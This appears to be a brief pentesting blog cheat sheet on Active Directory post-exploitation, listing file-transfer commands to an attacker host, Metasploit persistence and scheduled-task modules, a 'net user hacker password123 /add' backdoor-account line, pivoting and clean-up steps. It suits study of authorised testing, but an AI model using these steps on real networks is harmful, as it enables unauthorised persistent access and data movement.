Post Exploitation: Active Directory

Aditya Jha
Jul 20, 2023

File Transfer

Certutil

HTTP

  • python -m SimpleHTTPServer 80

Browser

  • Navigate directly to file

FTP

  • python -m pyftpdlib 21 (attacker machine)
  • ftp 10.10.10.10 (Attacker IP)

Linux

  • wget

Maintaining Access

Persistence Scripts

  • run persistence -h
  • exploit/windows/local/persistence
  • exploit/windows/local/registry_persistence

Schedule Tasks

  • run scheduleme
  • run schtaskabuse

Add a user

  • net user hacker password123 /add

Pivoting

Moving inside a network from one machine to another machine is known as Pivoting.

We can use Metasploit to attempt Pivoting.

We can use auxiliary/scanner/portscan/tcp in metasploit to attempt Pivoting.

Clean Up

Make the System/Network as it was when you entered it

  • Remove executables, scripts, and added files.
  • Remove malware, rootkits, and added user accounts
  • Set settings back to original configurations

--

--